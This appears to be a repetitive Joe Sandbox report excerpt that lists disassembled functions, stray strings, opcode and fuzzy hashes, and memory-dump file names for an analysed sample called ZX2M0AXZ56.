Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: X$X$Y$Y$Z$Z$q$}
API String ID: 0-540668698
Opcode ID: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
Instruction ID: c09710f6c7473334237833139a8f4806e1e73934edc25848dd64953462e7ad91
Opcode Fuzzy Hash: 92023e53b11931f45d32f5ecdcf6ed19e405229557f51b4b8869f4eaeec5f576
Instruction Fuzzy Hash: 6CA13B22E047D94EDF1189BD8C442EEAEA25BA7221F1D477AC8B5E73C2C56C49038365

Function 00542819 Relevance: 8.1, Strings: 6, Instructions: 595COMMON

Download Yara Rule

Strings

,, xrefs: 00542AC1
*, xrefs: 00542D6D
a, xrefs: 00542B86
R, xrefs: 00542BF3
!, xrefs: 00542DAE
&, xrefs: 00542A26

Memory Dump Source

Source File: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: !$&$*$,$R$a
API String ID: 0-2650817788
Opcode ID: d11973320c077b7fd7aac802e1f914bdac56d2f42672ec04910e21a232d8d641
Instruction ID: bc3ebcb9e21151228cc2ceec1a12aa93ce21382e61662e9fcd58e641386bfea5
Opcode Fuzzy Hash: d11973320c077b7fd7aac802e1f914bdac56d2f42672ec04910e21a232d8d641
Instruction Fuzzy Hash: EB124CB3F619250BF3640439CD583A2598397E1325F6F8279CE6C6BBC9D8BE4C4A4384

Function 005428C3 Relevance: 8.0, Strings: 6, Instructions: 457COMMON

Download Yara Rule

Strings

,, xrefs: 00542AC1
*, xrefs: 00542D6D
a, xrefs: 00542B86
R, xrefs: 00542BF3
!, xrefs: 00542DAE
&, xrefs: 00542A26

Memory Dump Source

Source File: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: !$&$*$,$R$a
API String ID: 0-2650817788
Opcode ID: a3e716c97110278ad11b250906ffb7d2b8c433200e8e067c7790b351e779de27
Instruction ID: 90a7d8b4702d88a784ea52c5cb7c34c2c2735e9f13d4141fca6a02a5e7f4aeea
Opcode Fuzzy Hash: a3e716c97110278ad11b250906ffb7d2b8c433200e8e067c7790b351e779de27
Instruction Fuzzy Hash: 97E129B3F619250BF3640439CD583A2598357E1325F6F8275CE6CABBC5D8BE4C4A42C4

Function 004D81CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004D84BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004D85B4

Strings

LF7Y, xrefs: 004D8951
_^]\, xrefs: 004D8A15

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: f16106e26305662c870047e4c11b5050451884f9714557b34ed2688c7b1bd545
Instruction ID: 9fa43789cc1bf3361fbc258c8656f32bc4c9393be502b1afe9fb7fd569defc3a
Opcode Fuzzy Hash: f16106e26305662c870047e4c11b5050451884f9714557b34ed2688c7b1bd545
Instruction Fuzzy Hash: DF220271908341CFD3248F28D89072FB7E1BF85310F1A4A6EE599573A1D7399921CB5A

Function 004C8169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

gfff, xrefs: 004C8458
2h?n, xrefs: 004C83A0
^`/4, xrefs: 004C81E1
SP, xrefs: 004C8396
7, xrefs: 004C8419

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID: 2h?n$7$SP$^`/4$gfff
API String ID: 0-3257051659
Opcode ID: ea7603e9954b579c8f5ca1b7196b5920b1c6741b930516f6c1e72f40eb6db326
Instruction ID: 9b4150293ab6c07527985298b34b6520c4c3ddb16d407adcff089a8ef51f3bd3
Opcode Fuzzy Hash: ea7603e9954b579c8f5ca1b7196b5920b1c6741b930516f6c1e72f40eb6db326
Instruction Fuzzy Hash: 6BA139B6A143504BD354CF28C851BAFB7E2FBC4318F598A3ED885D7391DB3898028786

Function 004DC9EB Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

_^]\, xrefs: 004DCA6F
EXCm, xrefs: 004DC9FE
EXCm, xrefs: 004DC8F5
_^]\, xrefs: 004DC96F

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
